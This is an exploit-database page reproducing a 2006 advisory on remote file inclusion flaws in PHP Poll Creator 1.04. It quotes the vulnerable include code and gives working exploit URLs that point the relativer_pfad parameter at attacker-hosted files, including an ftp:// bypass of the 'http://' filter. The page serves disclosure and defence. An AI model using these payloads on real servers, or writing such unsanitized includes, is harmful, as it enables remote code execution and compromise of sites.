header-logo
Suggest Exploit
vendor:
PHP Poll Creator
by:
iss4m
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: PHP Poll Creator
Affected Version From: 1.04
Affected Version To: 1.04
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

phpPC 1.04 Multiples Remote File Inclusion

phpPC 1.04 is vulnerable to multiple Remote File Inclusion vulnerabilities. The vulnerable files are poll.php, poll_kommentar.php and poll_sm.php. In poll.php, the vulnerable code is located at line 13, in poll_kommentar.php, the vulnerable code is located at line 18 and in poll_sm.php, the vulnerable code is located at line 8. An attacker can exploit these vulnerabilities by sending a malicious URL to the vulnerable application. For example, in poll.php, an attacker can send a malicious URL like http://localhost/phppc/poll.php?is_phppc_included=1&relativer_pfad=http://attacker/inject.txt?. Similarly, in poll_kommentar.php, an attacker can send a malicious URL like http://localhost/phppc/poll_kommentar.php?is_phppc_included=1&relativer_pfad=http://attacker/inject.txt? and in poll_sm.php, an attacker can send a malicious URL like http://localhost/pcc/poll_sm.php?is_phppc_included=1&relativer_pfad=ftp://attacker/inject.txt?.

Mitigation:

Upgrade to the latest version of phpPC 1.04 or apply the patch provided by the vendor.
Source

Exploit-DB raw data:

phpPC 1.04 Multiples Remote File Inclusion

Script        : PHP Poll Creator
Version       : 1.04
Vendor URL    : http://www.phppc.de
Impact        : Remote File Inclusion
Discovered by : iss4m
Contact       : iss4m.1@gmail.com


Vulnerable code in poll.php
--------------------------------

<?php
if ($is_phppc_included != 1) {
    include "config.inc.php";
    $file = "lib/functions.inc.php";
    include $relativer_pfad.$file;
    include ($relativer_pfad . "layout_top.inc.php");
    $is_phppc_included = 1;
}else include $relativer_pfad . "lib/get_config.inc.php"; #<== !!!!

Exploit :
**********

http://localhost/phppc/poll.php?is_phppc_included=1&relativer_pfad=http://attacker/inject.txt?


Vulnerable code in poll.php poll_kommentar.php
-----------------------------------------------

<?php

if ($is_phppc_included != 1) {
    include "config.inc.php";
    include ($relativer_pfad . "lib/functions.inc.php");
}
$com = "phppc_kommentar";
$cookie = $cookie_name.$com.$poll_id;
$cookie_ueberwachung = ${$cookie};
if($action=='new_com') {
    if ($cookie_ueberwachung=="flood") {
        $must_not_create_com = 1;
    }else {
        $zeit = time() + 30;
        SetCookie("$cookie_name$com$poll_id","flood","$zeit","/");        
    }
}
if ($is_phppc_included != 1) {
    include "layout_top.inc.php";
    $is_phppc_included = 1;
}
include $relativer_pfad . "poll_titel_kat.inc.php";  # Here !!!!!!!!


http://localhost/phppc/poll_kommentar.php?is_phppc_included=1&relativer_pfad=http://attacker/inject.txt ?



Vulnerable code in poll_sm.php
---------------------------------

if(substr_count($relativer_pfad,"http://") >= 1 OR substr_count($relativer_pfad,"../") >= 1) $relativer_pfad = "";

if ($is_phppc_included != 1) {
    $file = "lib/functions.inc.php";
    include $relativer_pfad.$file;
}
include ($relativer_pfad . "layout_top_sm.inc.php");


the script check only if $relativer_pfad contain "http://" but we can include remote file using ftp://

Exploit :
**********

http://localhost/phppc/poll_sm.php?is_phppc_included=1&relativer_pfad=ftp://user:pass@ftp.attacker.ltd/script.txt ?

# milw0rm.com [2006-11-21]

Navigation

Suggest Exploit

Services By CQR